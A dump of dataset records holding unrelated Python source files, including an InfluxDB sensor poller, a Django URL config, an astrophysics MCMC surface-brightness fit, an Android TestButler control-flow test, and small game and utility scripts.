\"a0e36d09e3bacaa3\"\nclient = InfluxDBClient(url=url, token=token)\nwrite_api = client.write_api(write_options=SYNCHRONOUS)\n\n\n\nfor device in devices:\n\n mac = config[device].get(\"device_mac\")\n poller = MiTempBtPoller(mac, BluepyBackend, ble_timeout=config[device].getint(\"timeout\", 10))\n\n try:\n temperature = poller.parameter_value(MI_TEMPERATURE)\n humidity = poller.parameter_value(MI_HUMIDITY)\n battery = poller.parameter_value(MI_BATTERY)\n\n data = json.dumps({\n \"temperature\": temperature,\n \"humidity\": humidity,\n \"battery\": battery\n })\n\n print(datetime.now(), device, \" : \", data)\n\n point = Point(\"sensordata\") \\\n .tag(\"device\", device) \\\n .field(\"temp\", temperature) \\\n .field(\"hum\", humidity) \\\n .field(\"battery\", battery) \\\n .time(datetime.utcnow(), WritePrecision.NS)\n\n write_api.write(bucket, org, point)\n\n\n except BTLEException as e:\n print(\"Error connecting to device {0}: {1}\".format(device, str(e)))\n except Exception as e:\n print(\"Error polling device {0}. Device might be unreachable or offline.\".format(device))\n print(traceback.print_exc())\n","sub_path":"data-read-influxcloud.py","file_name":"data-read-influxcloud.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"32834043","text":"from django.contrib import admin\nfrom django.urls import path,include\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n\n #svoy\n path('', include('apps.home.urls')),\n path('service/', include('apps.service.urls')),\n path('portfolio/', include('apps.portfolio.urls')),\n path('news/', include('apps.news.urls')),\n]\n\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)\n urlpatterns += static(settings.STATIC_URL, document_root = settings.STATIC_ROOT)","sub_path":"viento/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"278502814","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n\"\"\"\n\nimport logging\nimport Artus.Utility.logger as logger\nlog = logging.getLogger(__name__)\n\nimport array\nimport ROOT\nimport sys\n\nimport Artus.HarryPlotter.inputbase as inputbase\n\n\nclass InputInteractive(inputbase.InputBase):\n\tdef __init__(self):\n\t\tsuper(InputInteractive, self).__init__()\n\t\n\tdef modify_argument_parser(self, parser, args):\n\t\tsuper(InputInteractive, self).modify_argument_parser(parser, args)\n\t\t\n\t\tself.input_options.add_argument(\"--x-errors\", type=str, nargs=\"+\",\n\t\t help=\"x-error(s)\")\n\t\tself.input_options.add_argument(\"--y-errors\", type=str, nargs=\"+\",\n\t\t help=\"y-error(s)\")\n\t\tself.input_options.add_argument(\"--z-errors\", type=str, nargs=\"+\",\n\t\t help=\"z-error(s)\")\n\t\n\tdef prepare_args(self, parser, plotData):\n\t\tsuper(InputInteractive, self).prepare_args(parser, plotData)\n\t\t\n\t\tself.prepare_list_args(plotData, [\"nicks\", \"x_errors\", \"y_errors\", \"z_errors\"])\n\t\t\n\t\t# parse values/errors to plot\n\t\tvalues_keys = [\"x_expressions\", \"y_expressions\", \"z_expressions\"]\n\t\terrors_keys = [\"x_errors\", \"y_errors\", \"z_errors\"]\n\t\tfor key in values_keys + errors_keys:\n\t\t\tif plotData.plotdict[key] != None:\n\t\t\t\tplotData.plotdict[key] = [[float(value) for value in (values.split() if values != None else [])] for values in plotData.plotdict[key]]\n\t\t\n\t\t# set default errors to 0.0\n\t\tfor index in xrange(len(plotData.plotdict[\"nicks\"])):\n\t\t\tfor values_key, errors_key in zip(values_keys, errors_keys):\n\t\t\t\tplotData.plotdict[errors_key][index] = len(plotData.plotdict[values_key][index]) * [0.0]\n\t\t\n\t\t# check that x/y/z values/errors for one plot have the same size\n\t\tfor index in xrange(len(plotData.plotdict[\"nicks\"])):\n\t\t\tn_values_per_plot = []\n\t\t\tfor key in values_keys + errors_keys:\n\t\t\t\tif len(plotData.plotdict[key][index]) > 0:\n\t\t\t\t\tn_values_per_plot.append(len(plotData.plotdict[key][index]))\n\t\t\tassert(len(set(n_values_per_plot)) == 1)\n\t\n\tdef run(self, plotData):\n\t\t\n\t\tfor nick, x_values, x_errors, y_values, y_errors, z_values, z_errors in zip(plotData.plotdict[\"nicks\"],\n\t\t\t\tplotData.plotdict[\"x_expressions\"], plotData.plotdict[\"x_errors\"], plotData.plotdict[\"y_expressions\"],\n\t\t\t\tplotData.plotdict[\"y_errors\"], plotData.plotdict[\"z_expressions\"], plotData.plotdict[\"z_errors\"]):\n\t\t\n\t\t\tif len(z_values) > 0:\n\t\t\t\tplotData.plotdict.setdefault(\"root_objects\", {})[nick] = ROOT.TGraph2DErrors(len(x_values),\n\t\t\t\t\t\tarray.array(\"d\", x_values), array.array(\"d\", y_values), array.array(\"d\", z_values),\n\t\t\t\t\t\tarray.array(\"d\", x_errors), array.array(\"d\", y_errors), array.array(\"d\", z_errors))\n\t\t\telif len(y_values) > 0:\n\t\t\t\tplotData.plotdict.setdefault(\"root_objects\", {})[nick] = ROOT.TGraphErrors(len(x_values),\n\t\t\t\t\t\tarray.array(\"d\", x_values), array.array(\"d\", y_values),\n\t\t\t\t\t\tarray.array(\"d\", x_errors), array.array(\"d\", y_errors))\n\t\t\telse:\n\t\t\t\tlog.fatal(\"Need both x and y values to draw a graph!\")\n\t\t\t\tsys.exit(1)\n\t\t\n\t\t# run upper class function at last\n\t\tsuper(InputInteractive, self).run(plotData)\n\n","sub_path":"HarryPlotter/python/input_modules/inputinteractive.py","file_name":"inputinteractive.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"616278417","text":"#!/usr/bin/python3\nfrom main import app\nfrom daemon import runner\n\n\nclass App():\n def __init__(self):\n self.stdin_path = '/dev/null'\n self.stdout_path = '/dev/null'\n self.stderr_path = '/home/vitaly/lid'\n self.pidfile_path = '/tmp/python_daemon.pid'\n self.pidfile_timeout = 5\n\n def run(self):\n app.run()\n\n\ndaemon_app = App()\ndaemon_runner = runner.DaemonRunner(daemon_app)\ndaemon_runner.do_action()\n","sub_path":"daemon_runner.py","file_name":"daemon_runner.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"244974701","text":"from src.helpers.postprocess import get_attachment_counts_or_percents\n\nimport pandas as pd\nimport swifter # noqa: F401\nfrom ast import literal_eval\n\n\nif __name__ == \"__main__\":\n df_all = pd.read_csv(filepath_or_buffer='data/attachment_type_report.csv')\n\n id_columns = list(df_all.columns)\n\n # Reshape ---\n # filter for whitehall and specialist publisher-only\n df = df_all[df_all[\"publishing_app\"].isin([\"whitehall\", \"specialist\"])].copy()\n\n # convert each element to dictionary\n df[\"attachment_and_count\"] = df[\"attachment_and_count\"].swifter.apply(literal_eval)\n # turn each key into column\n df_attachments = pd.json_normalize(data=df[\"attachment_and_count\"])\n\n # identify pdf-only and html-only attachments\n # to see if reduction in pdf-only leads to rise in html-only\n col_names = list(df_attachments.columns)\n\n for attach in (\".pdf\", \".html\"):\n # identify pdf-only attachments - fragile since relies on \".pdf\" being first in tuple above\n if attach == \".pdf\":\n col_names.remove(\".pdf\")\n # identify html-only attachments - fragile since relies on \".pdf\" being first in tuple above\n elif attach == \".html\":\n col_names.append(\".pdf\")\n col_names.remove(\".html\")\n\n # get attachment + '_only' entries\n new_col_name = attach + '_only'\n df_attachments[new_col_name] = df_attachments.loc[:, col_names].isnull().all(axis=1) & \\\n df_attachments.loc[:, attach].notnull() # noqa: E127\n\n # concat horizontally these two dfs together\n df = pd.concat(objs=[df.reset_index(), df_attachments], axis=1)\n df = df.drop(columns=\"index\")\n del df_attachments, col_names\n\n # melt these attachment columns\n id_columns = id_columns + [\".pdf_only\", \".html_only\"]\n df = pd.melt(frame=df,\n id_vars=id_columns,\n var_name='attachment_type',\n value_name='attachment_count')\n # remove nas\n df = df.dropna(subset=[\"attachment_count\"])\n\n # remove brackets in primary_publishing_organisation\n df[\"primary_publishing_organisation\"] = df[\"primary_publishing_organisation\"].str.replace(pat=r'[\\[\\]]', repl='')\n # rename column to make it clearer this column is for QA purposes\n df = df.rename(columns={\"attachment_and_count\": \"qa_attachment_count\"})\n\n # Report: Organisation and Document Type ---\n # get reports along the following cuts:\n # i. Publishing organisation attachments for counts for all time\n # ii. Publishing organisation attachments for counts for restricted dates\n # iii. Publishing organisation attachments for percents for all time\n # iv. Publishing organisation attachments for percents for restricted dates\n # v. Document type attachments for counts for all time\n # vi. Document type attachments for counts for restricted dates\n # vii. Document type attachments for percents for all time\n # viii. Document type attachments for percents for restricted dates\n filters = {\"primary_publishing_organisation\": [\"counts\", \"percents\"],\n \"document_type\": [\"counts\", \"percents\"]}\n restrict_dates = ['2019-09-23', '2020-12-07']\n\n df_list = list()\n df_names_list = ['attachment_type_org_counts',\n 'attachment_type_org_restrict_dates_counts',\n 'attachment_type_org_percents',\n 'attachment_type_org_restrict_dates_percents',\n 'attachment_type_doc_counts',\n 'attachment_type_doc_restrict_dates_counts',\n 'attachment_type_doc_percents',\n 'attachment_type_doc_restrict_dates_percents']\n for key, value in filters.items():\n for v in value:\n df_temp_all = get_attachment_counts_or_percents(df=df, index=key, values=v)\n df_temp_all[\"date_coverage\"] = \"all\"\n df_temp_restrict = get_attachment_counts_or_percents(df=df, index=key, values=v, date=restrict_dates)\n df_temp_restrict[\"date_coverage\"] = ' to '.join(restrict_dates)\n df_list.append(df_temp_all)\n df_list.append(df_temp_restrict)\n\n del df_temp_all, df_temp_restrict, id_columns, key, value, filters, restrict_dates, attach, new_col_name\n\n # export to csv\n files_save = dict(zip(df_names_list, df_list))\n [v.to_csv(path_or_buf='data/' + k + '.csv', index=False) for k, v in files_save.items()]\n","sub_path":"src/report_generators/attachment_type_report_postprocess.py","file_name":"attachment_type_report_postprocess.py","file_ext":"py","file_size_in_byte":4461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"334983830","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# Gong@2019-03-29\n\nimport sys\nimport pygame\nimport settings\nfrom ship import Ship\nimport game_functions as gf\nfrom pygame.sprite import Group\n\ndef run_game():\n pygame.init()\n ai_settings = settings.Settings()\n screen = pygame.display.set_mode((ai_settings.screen_width,ai_settings.screen_height))\n pygame.display.set_caption(\"Alien Invasion\")\n ship = Ship(ai_settings, screen)\n bullets = Group()\n while True:\n gf.check_events(ai_settings, screen, ship, bullets)\n ship.update_self()\n bullets.update()\n # delete old bullets\n for bu in bullets.copy():\n if bu.rect.bottom <= 0:\n bullets.remove(bu)\n print(len(bullets))\n gf.update_screen(ai_settings, screen, ship, bullets)\n\n\nrun_game()\n","sub_path":"alien_invasion.py","file_name":"alien_invasion.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"2087095","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ax\nfrom matplotlib.ticker import MultipleLocator, FormatStrFormatter, LogLocator\nfrom matplotlib import rc\nrc('font', **{'family':'serif'})\nfrom scipy.integrate import quad, trapz, simps\n#import pickle\nimport emcee\nfrom astropy import constants as const\nimport astropy.units as u\nfrom clumps import*\nfrom functions_py3X import*\nimport h5py\nfrom astropy.io import fits\nfrom mcfit import P2xi\n\n# parallel MCMC\nfrom multiprocessing import Pool\nimport os\nfrom contextlib import closing\nos.environ[\"OMP_NUM_THREADS\"] = \"1\"\n\n\n\n\n\n# PARAMETERS - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - -- - - - - - - - - -\n\n\nemission = 1.37e-12*8.7 # effective rec * h * nu_Ha (erg) Te= 1e4k n_e = 100 cm-3\n\n# halo array\nr_halo = np.linspace(0.1,400.,200)\n\n\n# mcmc\nwalkers = 21\nsteps = 8000\nparameters = 7 # of the model\n\n\nredrange = np.array([3.5, 4.5, 5.5])\nnamerange = np.array(['34', '45', '56'])\n\n\n# satellites \nlyafesc = 0.5 # escape of lya photons from satellite galaxies\nduty = 0.01 # dutty cycle of the satellite star formation \n\nnhi = 1.55\n\n\n# - - - - - - - - - - - - - - - - - -- - - - - - - - - - - - - - - - - - - - -- - - - - - - - - -\n\n\n\n\n# MCMC FUNCTIONS \n \n\ndef fmodel(sfr, level, slope, position, residual, rhosfr, bias_product):\n # fc and fesc\n fcc = level / (1. + np.exp(slope * (r_halo - position) )) \n fcc[np.where(r_halo > position)] += residual\n \n #plt.plot(r_halo, fcc, 'k')\n #plt.semilogy(sxx, model, 'ro')\n #plt.show()\n #fgft\n relvel = 100\n fchi, fcfa, fca, fshi, fsa, fsfa = ffcfesc(fcc, nhi, relvel, z, r_halo)\n #plt.semilogy(r_halo, fca, 'k')\n #plt.semilogy(sxx, model, 'ro')\n #plt.show()\n #kajsd\n # introduce SFR\n nion = 1.38e53*sfr\n # factors multiplying SB\n factors = 2. / 3.08e21**2 / (1. +z)**4 * 2.35e-11 / 4.**2 / np.pi**2 * nion * emission\n total_lya_flux = sfr * sfrlya / 4. / np.pi / LD**2\n\n # sb calc\n flu, scat, fluscat = fsb(fchi, fshi, fca, fsa, fcfa, fsfa, r_halo)\n #fluscat[0]=fluscat[1] \n flus= flu* factors # point source fluorescence\n flus = 10** np.interp(pos, r_halo, np.log10(flus))\n #scats = scat * factors # point source scattering Lya \n #scats = 10** np.interp(pos, r_halo, np.log10(scats))\n #plt.semilogy(pos, scats, 'k')\n #plt.show()\n\n\n #print(fluxfraction(pos, scats))\n #scats = 10**np.interp(r_halo, pos, np.log10(scats), left=0.0, right=0.0)\n\n #a= fluxfraction(pos, scats)*kpc2arc**2 \n #print(kpc2arc**2)\n #print(1./ (1. +z)**4)\n #print(1./kpc2arc / (1.+z)**4)\n #asdf\n\n #scats = 10** np.interp(r_halo, pos, np.log10(scats))\n #convscat = conv(pos, scats, psf, pos)\n #convscat = 10**np.interp(r_halo, pos, convscat)\n #b= fluxfraction(pos, convscat)*kpc2arc**2 \n #print(a, b, a/b)\n #print(1- a/total_lya_flux, 1-b/total_lya_flux)\n\n # calculate unscattered \n #unscattfrac = np.max([0.0, 1. - unfsb(fchi, fshi, fca, fsa, fcfa, fsfa, r_halo)])\n #print('unscat frac = ', unscattfrac)\n #adsfa\n \n # add SB UVB\n uvb = fuvbsb(z, fchi, r_halo) * fphoto(z)\n uvb = 10** np.interp(pos, r_halo, np.log10(uvb))\n #plt.semilogy(pos, uvb, 'b')\n #plt.semilogy(pos, uvb)\n #plt.show()\n \n \n # add satellites \n sat = sbsat(z, rhosfr * maxsfr(z), bias_product, lyafesc, duty, r_xi, xi, r_halo)\n sat = 10** np.interp(pos, r_halo, np.log10(sat)) \n #plt.semilogy(pos, sat, 'r')\n #plt.show()\n #aksda\n\n \n\n # calculate unscattered\n #convlya = conv(pos, scats, psf)\n\n\n #frac = fluxfraction(pos, convlya) * kpc2arc**2 / total_lya_flux\n #print('unscat integ = ', np.max([0.0, 1-frac]))\n #print(' ')\n #print(' ')\n \n # add 3 SB components and convolve\n convscat = conv(pos, flus + uvb +sat , psf) \n\n \n \n # add unscattered convolved by psf \n #convscat += fremain(total_lya_flux, frac, psf)\n \n #plt.semilogy(pos, convscat)\n #plt.semilogy(pos, sb, 'ko')\n #plt.show()\n #alsjdf\n #convfluscat = conv(sxx, fluscats, psf, pos)\n\n \n \n return convscat\n\n\n\ndef log_likelihood(theta):\n\n sfr, level, logslope, position, logresidual, logsfr, bias_product = theta\n #print(theta)\n # now it is the model for SCATTERING \n #print(level, position, 10**logresidual, hislope)\n model = fmodel(sfr, level, 10**logslope, position, 10**logresidual, 10**logsfr, bias_product)\n\n sigma2 = sb_error ** 2 \n #plt.semilogy(sxx, sb, 'ko')\n #plt.semilogy(sxx, model, 'ro')\n #plt.show()\n #fgft\n return -0.5 * np.sum((sb - model) ** 2 / sigma2 + np.log(sigma2))\n\n\ndef log_prior(theta):\n sfr, level, logslope, position, logresidual, logsfr, bias_product=theta\n if (0.25 < sfr < 100. and 0.0 < level < 1.0 and -1.5 < logslope < 2.5 and 0. < position < 400. \n and -5.0 < logresidual < -1.5 \n and -5.0 < logsfr < 0. and (biaix/1.5)**2 < bias_product < 12* biaix**2):\n\n return 0.0\n return -np.inf\n\n\ndef log_probability(theta):\n lp = log_prior(theta)\n if not np.isfinite(lp):\n #print('inf')\n return -np.inf\n #print(lp + log_likelihood(theta))\n return lp + log_likelihood(theta)\n\n\n\n \n\n# DATA LOOP\n\nfor bs in range(len(redrange)):\n \n # parameters for this iteration\n z = redrange[bs]\n hmf.z = z\n zint = namerange[bs]\n LD = ((cosmo.luminosity_distance(z)).to('cm')).value\n kpc2arc = cosmo.arcsec_per_kpc_proper(z).value\n biaix = getbias(z)\n \n # sb data \n hdu = fits.open('./lutzprofiles/lyaprofile_muse2018_median_z'+str(zint)+'.fits')\n dad = hdu[1].data\n pos = np.array([])\n sb = np.array([])\n sb_error = np.array([])\n for x in range(len(dad)):\n pos = np.append(pos, dad[x][0] / kpc2arc)\n sb = np.append(sb, dad[x][2])\n sb_error = np.append(sb_error, dad[x][3])\n \n \n # psf data \n hdu = fits.open('./lutzprofiles/psfprofile_muse2018_z'+str(zint)+'.fits')\n dad = hdu[1].data\n pospsf = np.array([])\n psf = np.array([])\n for x in range(len(dad)):\n pospsf = np.append(pospsf, dad[x][0] / kpc2arc)\n psf = np.append(psf, dad[x][1])\n # normalize psf\n psf = fnormpsf(pos, pospsf, psf)\n \n \n # SATELLITE GALAXIES\n # power spectrum\n pk = hmf.nonlinear_power\n k = hmf.k \n # correlation function\n r_xi, xi = P2xi(k)(pk)\n # proper kpc\n r_xi = r_xi / h / (1.+z) *1000.\n #plt.loglog(r_xi, xi)\n #plt.show()\n #alkdsj\n \n \n \n # MCMC \n # set walkers and initiate\n ini = (np.array([50., 0.5, 0.0, 25., -3.0, -2.5, biaix**2]) + \n np.array([49., 0.4, 1.,20.,1., 2.3, biaix**2-0.1])*np.random.uniform(-1.0, 1.0, (walkers, parameters)))\n #ini = np.array([1.5, 1.0, 0.0, 30., -3.5, 1.4, 240.0, -2., biaix**2]) + 1e-4 * np.random.rand(walkers, parameters)\n nwalkers, ndim = ini.shape\n \n \n\n \n \n # Backend\n filen = './lutzprofiles/fluo_sat_uvb_lutz'+str(zint)+'.h5'\n backend = emcee.backends.HDFBackend(filen)\n backend.reset(nwalkers, ndim)\n \n \n # SERIE \n # run mcmc \n #maxsteps = 500\n #old_tau = np.inf \n #sampler = emcee.EnsembleSampler(nwalkers, ndim, log_probability)\n #for sample in sampler.sample(pos, iterations=maxsteps, progress=True):\n # # check every 50\n # if sampler.iteration % 10:\n # continue\n # tau = sampler.get_autocorr_time(tol=0)\n # # check convergence\n # converged = np.all(tau < sampler.iteration)\n # converged &= np.all(np.abs(old_tau - tau) / tau < 0.5)\n # if converged:\n # print(' converged at ' + str(tau))\n # break\n # old_tau = tau\n # show progress\n #sampler.run_mcmc(ini, maxsteps, progress=True)\n \n \n \n # PARALLEL\n # old_tau = np.inf\n # index = 0\n # max_steps = 10000\n # autocorr = np.empty(max_steps)\n # check = 20\n # times_greater = 9\n # tau_dif = .2\n\n with closing(Pool()) as pool:\n sampler = emcee.EnsembleSampler(nwalkers, ndim, log_probability, pool=pool, backend=backend)\n sampler.run_mcmc(ini, steps, progress=True)\n # # check concergence every check # of steps\n # for sample in sampler.sample(ini, iterations=max_steps, progress=True): \n # if sampler.iteration % check:\n # continue\n # tau = sampler.get_autocorr_time(tol=0)\n # autocorr[index] = np.mean(tau)\n # converged = np.all(np.abs(old_tau - tau) / tau < tau_dif)\n # converged &= np.all(tau * times_greater < sampler.iteration)\n # if converged:\n # break\n # index += 1\n # old_tau = tau\n pool.terminate()\n # np.savez('./tau_array_file', autocorr[: index+1])\n \n # # plot convergence\n # x = check * np.arange(1, index + 2)\n # y = autocorr[: index+1]\n # plt.plot(x, x / times_greater, \"--k\")\n # plt.plot(x, y)\n # plt.xlabel(\"number of steps\")\n # plt.ylabel(r\"mean $\\hat{\\tau}$\");\n # plt.title(f'converged at tau = {tau}, steps = {check*(index + 1)}')\n # plt.show()\n \n # burning\n #flat_samples = sampler.get_chain(discard=100, thin=15, flat=True)\n \n # plot sampling\n #fig, axes = plt.subplots(parameters, figsize=(10, parameters), sharex=True)\n #samples = sampler.get_chain()\n #labels = [\"level\", \"slope\", \"position\", \"residual\", \"hislope\", \"relvel\", \"log(f)\"]\n #for i in range(ndim):\n # ax = axes[i]\n # ax.plot(samples[:, :, i], \"k\", alpha=0.3)\n # ax.set_xlim(0, len(samples))\n # ax.set_ylabel(labels[i])\n # ax.yaxis.set_label_coords(-0.1, 0.5)\n\n #axes[-1].set_xlabel(\"step number\");\n #plt.show()\n \n \n # plot results\n #for i in range(ndim):\n #mcmc = np.percentile(flat_samples[:, i], [16, 50, 84])\n #q = np.diff(mcmc)\n #txt = \"\\mathrm{{{3}}} = {0:.3f}_{{-{1:.3f}}}^{{{2:.3f}}}\"\n #txt = txt.format(mcmc[1], q[0], q[1], labels[i])\n #display(Math(txt))\n \n \n #lajds\n \n\n","sub_path":"lutz2018satel_fluo_py3X.py","file_name":"lutz2018satel_fluo_py3X.py","file_ext":"py","file_size_in_byte":10090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"121982801","text":"import car\nimport weather\nimport notification\n\n\nclass Competition:\n\t\"\"\"Гонка\"\"\"\n\n\t_instance = None\n\n\tdef __new__(cls, *args, **kwargs):\n\t\tif cls._instance is None:\n\t\t\t# Возможно наличие только 1 экземпляра класса\n\t\t\tcls._instance = super().__new__(cls)\n\t\treturn(cls._instance)\n\n\tdef __init__(self, distance):\n\t\tself._distance = distance\n\t\tself._competitors = []\n\t\tself._weather = weather.BaseWeather()\n\t\tself._notification_manager = notification.NotificationManager()\n\t\t\n\tdef set_weather(self, wind_speed=None, ice = None):\n\t\tif not wind_speed is None:\n\t\t\ttry:\n\t\t\t\tif not self._weather.wind_speed is None:\n\t\t\t\t\tself._weather.wind_speed = wind_speed\n\t\t\texcept Exception as e:\n\t\t\t\tself._weather = weather.Wind(self._weather)\n\t\t\t\tself._weather.wind_speed = wind_speed\n\n\t\tif not ice is None:\n\t\t\ttry:\n\t\t\t\tif not self._weather.ice is None:\n\t\t\t\t\tself._weather.ice = ice\n\t\t\texcept Exception as e:\n\t\t\t\tself._weather = weather.Ice(self._weather)\n\t\t\t\tself._weather.ice = ice\n\t\t\t\n\tdef set_competitors(self, competitors):\n\t\tfor competitor in competitors:\n\t\t\tif not competitor in self._competitors:\n\t\t\t\tself._competitors.append(competitor)\n\n\tdef start(self):\n\t\tcompetitors = self._get_cars()\n\t\tresult = self._get_result(self._distance, competitors)\n\t\tself._print_result(result)\n\n\tdef _get_cars(self):\n\t\tcompetitors=[]\n\t\tfor competitor in self._competitors:\n\t\t\tthis_car = car.Car(competitor)\n\t\t\tcompetitors.append(this_car)\n\t\t\tself._notification_manager.subscribe(this_car)\n\t\treturn(competitors)\n\n\tdef _get_result(self, distance, competitors):\n\t\tresult = {} if len(competitors)>0 else False\n\t\tfor competitor in competitors:\n\t\t\tcompetitor_time = 0\n\t\t\tfor step in range(distance):\n\t\t\t\ttime = competitor.get_time(competitor_time, self._weather)\n\t\t\t\tcompetitor_time += time\n\t\t\tresult[competitor.name] = competitor_time\n\t\treturn(result)\n\t\t\n\tdef _print_result(self, result):\n\t\tif result:\n\t\t\tself._notification_manager.notify(result)\n\t\telse: print('None competitors!')\n\n\nobj_competition = Competition(10000)\nobj_competition.set_weather(wind_speed=20)\nobj_competition.set_weather(wind_speed=40, ice = True)\nobj_competition.set_competitors(['ferrary'])\nobj_competition.set_competitors(['bugatti', 'toyota','lada','sx4'])\nobj_competition.start()\n","sub_path":"01 сompetition/сompetition.py","file_name":"сompetition.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"483509349","text":"\"\"\"\r\nThis test file performs rudimentary tests on the control flow of TestButler running on the device\r\nIt uses a backdoor request to TestButler to have it initiate a given string command, and the response here is hard\r\ncoded. This is a little hokey, but allows us to test the very basics before anything more elaborate. More\r\nelaborate tests are done elsewhere\r\n\"\"\"\r\nimport logging\r\nimport pytest\r\n\r\nfrom collections import deque\r\nfrom androidtestorchestrator.device import Device\r\nfrom androidtestorchestrator.devicelog import DeviceLog\r\nfrom androidtestorchestrator.application import ServiceApplication\r\nfrom androidtestorchestrator.parsing import TestButlerCommandParser\r\nfrom typing import Callable\r\n\r\n\r\nTAG = \"TestButler\"\r\nlog = logging.getLogger(__name__)\r\n\r\n\r\n@pytest.fixture(scope='session')\r\ndef install_butler(device: Device, test_butler_service: str):\r\n \"\"\"\r\n fixture to install test butler service, prepare logcat\r\n :return: logcat process and iterator over stdout\r\n \"\"\"\r\n service = ServiceApplication.install(test_butler_service, device)\r\n DeviceLog(device).clear()\r\n return service\r\n\r\n\r\n# noinspection PyShadowingNames,PyUnusedLocal\r\nclass TestButlerControlFlow:\r\n\r\n @pytest.mark.parametrize('execution_number', range(10))\r\n # @pytest.mark.skipif(True, reason=\"Only for manual checkout. Other tests will stress test integrated system\")\r\n def test_control_flow(self, device: Device, install_butler: ServiceApplication, execution_number: int):\r\n butler_service = install_butler\r\n import asyncio\r\n cmd = [\"logcat\", \"-v\", \"brief\", \"-s\", TAG]\r\n line_count = 0\r\n\r\n flow_seqence = deque([\"awaiting_command\",\r\n \"awaiting_response_confirmation\",\r\n \"awaiting_response_confirmation_code\"])\r\n\r\n class Parser(TestButlerCommandParser):\r\n @staticmethod\r\n def request_command(cmd: str):\r\n cmd = cmd.replace(\" \", \"\\\\ \")\r\n butler_service.start(\".ButlerService\", \"--es\", \"command\", cmd,\r\n intent=\"com.linkedin.android.testbutler.FOR_TEST_ONLY_SEND_CMD\")\r\n\r\n def parse_line(self, line: str):\r\n nonlocal line_count\r\n\r\n if line_count == 0:\r\n line_count += 1\r\n if line != \"---------\":\r\n log.error(\"Logcat did not start with expected line of output\")\r\n # use standard first line of output from logcat to\r\n # kickoff sending backdoor to tell device to echo a test butler command back to this host\r\n self.request_command(\"just a test\")\r\n return\r\n if line.startswith('----'):\r\n return\r\n\r\n if flow_seqence[0] == \"awaiting_command\":\r\n # process line and next informational logcat message should be command that was sent\r\n preamble, line = line.split(\":\", 1)\r\n line = line.strip()\r\n priority, tag = preamble.split(\"(\")[0].split('/', 1)\r\n if priority == \"D\":\r\n return\r\n flow_seqence.popleft()\r\n assert tag == TAG\r\n cmd_id, cmd = line.replace(\"\\\\\", '').split(\" \", 1)\r\n assert cmd == \"TEST_ONLY just a test\"\r\n\r\n # send hard-coded response back based on received id,\r\n # with next to-list item being to wait on the response confirmation back from device\r\n cmd_id = int(cmd_id)\r\n self._send_response(cmd_id=cmd_id, response_code=0, response_msg=\"Success\")\r\n elif flow_seqence[0] == \"awaiting_response_confirmation\":\r\n if line.startswith(\"-----\"):\r\n log.error(\"Recieved unexpected logcat message:\\n \" + line)\r\n if \"crash\" in line:\r\n raise Exception(\"logcat crashed\")\r\n return\r\n if \"Error\" in line:\r\n raise Exception(\"Error processing response: %s\" % line)\r\n if \"Sending command\" in line:\r\n return\r\n try:\r\n preamble, line = line.split(\":\", 1)\r\n line = line.strip()\r\n priority, tag = preamble.split(\"(\")[0].split('/', 1)\r\n except ValueError:\r\n log.error(\"Received unexpected logcat message:\\n \" + line)\r\n return\r\n if priority != 'D':\r\n return\r\n flow_seqence.popleft()\r\n assert tag == TAG\r\n assert line == \"CMD RESPONSE MSG: Success\"\r\n elif flow_seqence[0] == \"awaiting_response_confirmation_code\":\r\n try:\r\n preamble, line = line.split(\":\", 1)\r\n line = line.strip()\r\n priority, tag = preamble.split(\"(\")[0].split('/', 1)\r\n except:\r\n log.error(\"Recieved unexpected logcat message:\\n \" + line)\r\n return\r\n if priority != 'D':\r\n return\r\n flow_seqence.popleft()\r\n assert tag == TAG\r\n assert line == \"CMD RESPONSE STATUS: 0\"\r\n\r\n async def parse_logcat():\r\n line_parser = Parser(app_under_test=None, service=butler_service)\r\n async for line in DeviceLog(device).logcat(\"-v\", \"brief\", \"-s\", TAG):\r\n try:\r\n line_parser.parse_line(line)\r\n except Exception as e:\r\n log.error(\"Exception in processing line: %s\\n %s\" % (line, str(e)))\r\n asyncio.get_event_loop().stop()\r\n if len(flow_seqence) == 0:\r\n break\r\n\r\n async def timer():\r\n await asyncio.wait_for(parse_logcat(), timeout=3*60)\r\n\r\n asyncio.get_event_loop().run_until_complete(timer())\r\n assert len(flow_seqence) == 0, \"Transactions were incomplete\"\r\n","sub_path":"orchestrator/test/test_component_integration/test_butler_control_flow.py","file_name":"test_butler_control_flow.py","file_ext":"py","file_size_in_byte":6307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"602697226","text":"# coding=utf-8\r\n\r\nimport psutil\r\nimport traceback\r\nimport os\r\nfrom run_servers import NAME\r\n\r\ndef removeLog():\r\n basePath = '%s\\log'%os.getcwd()\r\n logs = os.listdir(basePath)\r\n for _log in logs:\r\n if _log == '.gitignore':\r\n continue\r\n filePath = '%s\\%s'%(basePath,_log)\r\n try:\r\n os.remove(filePath)\r\n except:\r\n print(u'[删除日志文件] [%s] 失败' % _log)\r\n traceback.print_exc()\r\n else:\r\n print(u'[已删除日志文件] [%s]'%_log)\r\n\r\ndef close_server():\r\n mainPids = []\r\n pids = psutil.pids()\r\n for pid in 